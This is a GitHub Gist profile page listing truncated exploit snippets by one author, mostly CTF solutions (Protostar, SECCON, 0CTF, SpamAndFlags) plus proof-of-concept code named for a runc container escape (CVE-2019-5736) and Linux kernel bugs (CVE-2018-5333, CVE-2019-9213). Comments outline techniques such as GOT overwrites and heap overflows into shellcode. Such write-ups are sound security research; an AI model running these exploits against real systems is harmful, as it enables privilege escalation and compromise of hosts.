Skip to content

Instantly share code, notes, and snippets.

View wbowling's full-sized avatar

William Bowling wbowling

298 followers · 3 following
View GitHub Profile
@wbowling
wbowling / mission009.c
Created July 20, 2017 14:45
#include <stdio.h>
#include <stdlib.h>
int main() {
// char *pass = "THE SECRET HAS BEEN REMOVED LOL";
char *pass = "\x9a\x60\x76\x14\x8b\x36\x5a\x10\x2b\x91\xc4\x6c\xab\x27\x92\x99\xf8\x6a\xec\x5d\x32\x20\x3d\x61\x8f\xc7\xfb\xdd\x02\x72\xbf";
char key[31];
char out[31];
// 2017-07-16 to 2017-07-20
@wbowling
wbowling / mission009.py
Created July 21, 2017 05:30
#!/usr/bin/env python
import string
def srand(s):
global seed
seed = s
# microsoft c runtime implementation
def rand():
global seed
@wbowling
wbowling / format0.py
Created November 18, 2017 13:12
https://exploit-exercises.com/protostar/format0/ with modern gcc and aslr https://asciinema.org/a/148133
#!/usr/bin/env python2
"""
Overwrite the GOT entry for __stack_chk_fail with 0x40061a so we jump there instead.
The address can be passed in via argv, we cant use nulls but we can use blank strings instead.
As the argv location is semi random, it takes around 500 iterations which is pretty reasonable for 64bit
"""
@wbowling
wbowling / stack0_wrapper.sh
Created July 16, 2017 01:48
#!/bin/bash
ulimit -c 0
export LIBC_FATAL_STDERR_=1
python -c 'print "\xcc\x84\x04\x08"*16 + "\x00\x03\x02\x01" + "DDDD"' > input.bin
output=""
COUNTER=0
while [[ ! $output =~ "modified" ]]; do
MOD=$(( $COUNTER % 1000 ))
@wbowling
wbowling / internet_of_seat.py
Last active November 2, 2018 09:03
SECCON 2018 internet_of_seat - https://score-quals.seccon.jp/challenges#internet_of_seat
#!/usr/bin/env python2
# pylint: skip-file
"""
When performing a chunked transfer, realloc doesnt take into account the size of the headers allowing an overflow.
As the initial heap (0x100) is located inline we can overwrite the current heap location.
* overwrite __malloc_heap to point to our fake heap
* our fake heap size is huge so that memory os returned near the GOT
* overwrite memchr got with shellcode address
* win
@wbowling
wbowling / Dockerfile
Last active April 16, 2019 18:04
POC for CVE-2019-5736
FROM ubuntu
RUN apt-get update -y && apt-get install -y gcc
RUN ( \
echo '#define _GNU_SOURCE'; \
echo '#include <fcntl.h>'; \
echo '#include <stdio.h>'; \
echo '#include <unistd.h>'; \
\
echo 'char *getenv(const char *__name) {'; \
@wbowling
wbowling / test
Created July 30, 2019 00:52
test
@wbowling
wbowling / cve-2018-5333-poc.c
Created March 9, 2019 01:26
Example of using CVE-2019-9213 to make previous kernel bugs exploitable
// 4.4.0-116-generic #140-Ubuntu SMP
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
@wbowling
wbowling / nativity_scene.js
Created May 11, 2020 14:13
Nativity Scene from SpamAndFlags CTF 2020
let oob, oob_rw, base;
function setup() {
oob = new Uint8Array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]);
oob_rw = new BigUint64Array([
0x1111111122222222n,
0x1111111122222222n,
0x1111111122222222n,
]);
@wbowling
wbowling / amp2020.py
Last active June 29, 2020 04:12
Solution to amp2020 from 0CTF/TCTF 2020 Quals
#!/usr/bin/env python
from pwn import *
import requests
import string
"""
* can add arbitrary html and pass the validator by adding a tag comment inside the <noscript> and close it
* axios uses `input` directly and we can make it an object allowing full param control
* cheerio needs a string, but axios tries to return the response as json. If you add `爀` and set the `responseEncoding` to `ascii` the json parsing fails and it returns text